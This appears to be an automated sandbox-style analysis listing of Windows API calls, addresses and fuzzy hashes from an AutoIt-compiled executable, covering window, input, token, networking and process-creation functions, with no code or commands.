                        • Instruction Fuzzy Hash: E4411C39200921DFCB10EF19D588E59BBF1FF49710B098498E88A9B366CB34FD05DB92
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00948B4D
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: 13f739dceb36c0d74296a5f416ec430dfb3915fdbbc737a4a416c0fec942a964
                        • Instruction ID: 86b8464c6c1f8ea9afc5f81b329e7b6b9ff45cee72e308490d566f55a871b2ba
                        • Opcode Fuzzy Hash: 13f739dceb36c0d74296a5f416ec430dfb3915fdbbc737a4a416c0fec942a964
                        • Instruction Fuzzy Hash: 9A31E2B4654208BFEF249E58CC95FBF37A8FB06320F244A16FA51D62A0DE34A9409B41
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 0094AE1A
                        • GetWindowRect.USER32(?,?), ref: 0094AE90
                        • PtInRect.USER32(?,?,0094C304), ref: 0094AEA0
                        • MessageBeep.USER32(00000000), ref: 0094AF11
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 57f3f57d0995cd3aa006dc1bb0541bf6f32a8e8364896847a49967f542217ac5
                        • Instruction ID: cba08c86ff46a78886e06d3b7a30834caea4b787759ad9d969998c877ecd23bb
                        • Opcode Fuzzy Hash: 57f3f57d0995cd3aa006dc1bb0541bf6f32a8e8364896847a49967f542217ac5
                        • Instruction Fuzzy Hash: 7D418D7465411ADFCB11CF58C884F6ABBF5FF89350F1481A9E8288B351D730A801DF92
                        APIs
                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00921037
                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00921053
                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009210B9
                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0092110B
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 91eb55f96fcbade9ff8f18451459da487bab80aaa4f4ad8f0edf3afbc513235f
                        • Instruction ID: caacf7a415f4e566105b62d0517bfc9275a54ee317aad9c7f3ef72b33c58babe
                        • Opcode Fuzzy Hash: 91eb55f96fcbade9ff8f18451459da487bab80aaa4f4ad8f0edf3afbc513235f
                        • Instruction Fuzzy Hash: F2316E30EC46B8AEFF308B65AC05BFABBADABA5310F14431AF580521D9C3744DE19791
                        APIs
                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00921176
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00921192
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 009211F1
                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00921243
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 1c04b16f4423611ada643b770d5c439cc62ecfc8be1f0f30764d970ebd529cbd
                        • Instruction ID: f318f2cd832d36fe0481487311e1f8c1b5ad0f25b23fbd2976a4c7feb6b65907
                        • Opcode Fuzzy Hash: 1c04b16f4423611ada643b770d5c439cc62ecfc8be1f0f30764d970ebd529cbd
                        • Instruction Fuzzy Hash: A5315A30A4832C9EFF348F65AC15BFA7BBEABA9310F04435AF590921DAC33849749751
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008F644B
                        • __isleadbyte_l.LIBCMT ref: 008F6479
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008F64A7
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008F64DD
                        APIs
                        • GetForegroundWindow.USER32 ref: 00945189
                          • Part of subcall function 0092387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00923897
                          • Part of subcall function 0092387D: GetCurrentThreadId.KERNEL32 ref: 0092389E
                          • Part of subcall function 0092387D: AttachThreadInput.USER32(00000000,?,009252A7), ref: 009238A5
                        • GetCaretPos.USER32(?), ref: 0094519A
                        • ClientToScreen.USER32(00000000,?), ref: 009451D5
                        • GetForegroundWindow.USER32 ref: 009451DB
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • GetCursorPos.USER32(?), ref: 0094C7C2
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008FBBFB,?,?,?,?,?), ref: 0094C7D7
                        • GetCursorPos.USER32(?), ref: 0094C824
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008FBBFB,?,?,?), ref: 0094C85E
                        APIs
                          • Part of subcall function 00918652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00918669
                          • Part of subcall function 00918652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00918673
                          • Part of subcall function 00918652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00918682
                          • Part of subcall function 00918652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00918689
                          • Part of subcall function 00918652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091869F
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00918BEB
                        • _memcmp.LIBCMT ref: 00918C0E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00918C44
                        • HeapFree.KERNEL32(00000000), ref: 00918C4B
                        APIs
                        • __setmode.LIBCMT ref: 008E0BF2
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00927B20,?,?,00000000), ref: 008C5B8C
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00927B20,?,?,00000000,?,?), ref: 008C5BB0
                        • _fprintf.LIBCMT ref: 008E0C29
                        • OutputDebugStringW.KERNEL32(?), ref: 00916331
                          • Part of subcall function 008E4CDA: _flsall.LIBCMT ref: 008E4CF3
                        • __setmode.LIBCMT ref: 008E0C5E
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00931A97
                          • Part of subcall function 00931B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00931B40
                          • Part of subcall function 00931B21: InternetCloseHandle.WININET(00000000), ref: 00931BDD
                        APIs
                          • Part of subcall function 0091F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0091E1C4,?,?,?,0091EFB7,00000000,000000EF,00000119,?,?), ref: 0091F5BC
                          • Part of subcall function 0091F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0091F5E2
                          • Part of subcall function 0091F5AD: lstrcmpiW.KERNEL32(00000000,?,0091E1C4,?,?,?,0091EFB7,00000000,000000EF,00000119,?,?), ref: 0091F613
                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0091EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0091E1DD
                        • lstrcpyW.KERNEL32(00000000,?), ref: 0091E203
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0091EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0091E237
                        APIs
                        • _free.LIBCMT ref: 008F5351
                          • Part of subcall function 008E594C: __FF_MSGBANNER.LIBCMT ref: 008E5963
                          • Part of subcall function 008E594C: __NMSG_WRITE.LIBCMT ref: 008E596A
                          • Part of subcall function 008E594C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,00000000,?,?,?,008E1013,?), ref: 008E598F
                        APIs
                        • _memset.LIBCMT ref: 008C4560
                          • Part of subcall function 008C410D: _memset.LIBCMT ref: 008C418D
                          • Part of subcall function 008C410D: _wcscpy.LIBCMT ref: 008C41E1
                          • Part of subcall function 008C410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008C41F1
                        • KillTimer.USER32(?,00000001,?,?), ref: 008C45B5
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C45C4
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008FD6CE
                        APIs
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00927B20,?,?,00000000), ref: 008C5B8C
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00927B20,?,?,00000000,?,?), ref: 008C5BB0
                        • gethostbyname.WSOCK32(?,?,?), ref: 009366AC
                        • WSAGetLastError.WSOCK32(00000000), ref: 009366B7
                        • _memmove.LIBCMT ref: 009366E4
                        • inet_ntoa.WSOCK32(?), ref: 009366EF
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00919043
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00919055
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091906B
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00919086
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DefDlgProcW.USER32(?,00000020,?), ref: 008C12D8
                        • GetClientRect.USER32(?,?), ref: 008FB84B
                        • GetCursorPos.USER32(?), ref: 008FB855
                        • ScreenToClient.USER32(?,?), ref: 008FB860
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 0092166F
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 00921694
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 0092169E
                        • Sleep.KERNEL32(?,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 009216D1
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 0094B59E
                        • ScreenToClient.USER32(?,?), ref: 0094B5B6
                        • ScreenToClient.USER32(?,?), ref: 0094B5DA
                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0094B5F5
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        APIs
                        • _memset.LIBCMT ref: 0094B8FE
                        • _memset.LIBCMT ref: 0094B90D
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00987F20,00987F64), ref: 0094B93C
                        • CloseHandle.KERNEL32 ref: 0094B94E
                        Similarity
                        • API ID: _memset$CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3277943733-0
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 00926E88
                          • Part of subcall function 0092794E: _memset.LIBCMT ref: 00927983
                        • _memmove.LIBCMT ref: 00926EAB
                        • _memset.LIBCMT ref: 00926EB8
                        • LeaveCriticalSection.KERNEL32(?), ref: 00926EC8
                        Similarity
                        • API ID: CriticalSection_memset$EnterLeave_memmove
                        • String ID:
                        • API String ID: 48991266-0
                        APIs
                          • Part of subcall function 008C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008C134D
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C135C
                          • Part of subcall function 008C12F3: BeginPath.GDI32(?), ref: 008C1373
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C139C
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094C030
                        • LineTo.GDI32(00000000,?,?), ref: 0094C03D
                        • EndPath.GDI32(00000000), ref: 0094C04D
                        • StrokePath.GDI32(00000000), ref: 0094C05B
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091A399
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0091A3AC
                        • GetCurrentThreadId.KERNEL32 ref: 0091A3B3
                        • AttachThreadInput.USER32(00000000), ref: 0091A3BA
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        APIs
                        • GetSysColor.USER32(00000008), ref: 008C2231
                        • SetTextColor.GDI32(?,000000FF), ref: 008C223B
                        • SetBkMode.GDI32(?,00000001), ref: 008C2250
                        • GetStockObject.GDI32(00000005), ref: 008C2258
                        • GetWindowDC.USER32(?,00000000), ref: 008FC0D3
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 008FC0E0
                        • GetPixel.GDI32(00000000,?,00000000), ref: 008FC0F9
                        • GetPixel.GDI32(00000000,00000000,?), ref: 008FC112
                        • GetPixel.GDI32(00000000,?,?), ref: 008FC132
                        • ReleaseDC.USER32(?,00000000), ref: 008FC13D
                        Similarity
                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                        • String ID:
                        • API String ID: 1946975507-0
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 00918C63
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,0091882E), ref: 00918C6A
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0091882E), ref: 00918C77
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,0091882E), ref: 00918C7E
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        APIs
                        • GetDesktopWindow.USER32 ref: 00902187
                        • GetDC.USER32(00000000), ref: 00902191
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009021B1
                        • ReleaseDC.USER32(?), ref: 009021D2
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        APIs
                        • GetDesktopWindow.USER32 ref: 0090219B
                        • GetDC.USER32(00000000), ref: 009021A5
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009021B1
                        • ReleaseDC.USER32(?), ref: 009021D2
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        APIs
                        • OleSetContainedObject.OLE32(?,00000001), ref: 0091B981
                        Strings
                        Similarity
                        • API ID: ContainedObject
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3565006973-3941886329
                        APIs
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • __wcsnicmp.LIBCMT ref: 0092B298
                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0092B361
                        Strings
                        Similarity
                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                        • String ID: LPT
                        • API String ID: 3222508074-1350329615
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 008D2AC8
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 008D2AE1
                        Strings
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        APIs
                          • Part of subcall function 008C506B: __fread_nolock.LIBCMT ref: 008C5089
                        • _wcscmp.LIBCMT ref: 00929AAE
                        • _wcscmp.LIBCMT ref: 00929AC1
                        Strings
                        Similarity
                        • API ID: _wcscmp$__fread_nolock
                        • String ID: FILE
                        • API String ID: 4029003684-3121273764
                        APIs
                        • _memset.LIBCMT ref: 00932892
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009328C8
                        Strings
                        Similarity
                        • API ID: CrackInternet_memset
                        • String ID: |
                        • API String ID: 1413715105-2343686810
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 00946D86
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00946DC2
                        Strings
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        APIs
                        • _memset.LIBCMT ref: 00922E00
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00922E3B
                        Strings
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009469D0
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009469DB
                        Strings
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        APIs
                          • Part of subcall function 008C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008C1D73
                          • Part of subcall function 008C1D35: GetStockObject.GDI32(00000011), ref: 008C1D87
                          • Part of subcall function 008C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C1D91
                        • GetWindowRect.USER32(00000000,?), ref: 00946EE0
                        • GetSysColor.USER32(00000012), ref: 00946EFA
                        Strings
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 00946C11
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00946C20
                        Strings
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        APIs
                        • _memset.LIBCMT ref: 00922F11
                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00922F30
                        Strings
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00932520
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00932549
                        Strings
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        APIs
                          • Part of subcall function 0093830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009380C8,?,00000000,?,?), ref: 00938322
                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009380CB
                        • htons.WSOCK32(00000000,?,00000000), ref: 00938108
                        Strings
                        Similarity
                        • API ID: ByteCharMultiWidehtonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 2496851823-2422070025
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00919355
                        Strings
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0091924D
                        Strings
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 009192D0
                        Strings
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        APIs
                        Strings
                        Similarity
                        • API ID: ClassName_wcscmp
                        • String ID: #32770
                        • API String ID: 2292705959-463685578
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009181CA
                          • Part of subcall function 008E3598: _doexit.LIBCMT ref: 008E35A2
                        Strings
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        APIs
                          • Part of subcall function 008FB564: _memset.LIBCMT ref: 008FB571
                          • Part of subcall function 008E0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008FB540,?,?,?,008C100A), ref: 008E0B89
                        • IsDebuggerPresent.KERNEL32(?,?,?,008C100A), ref: 008FB544
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008C100A), ref: 008FB553
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008FB54E
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 3158253471-631824599
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00945BF5
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00945C08
                          • Part of subcall function 009254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0092555E
                        Strings
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461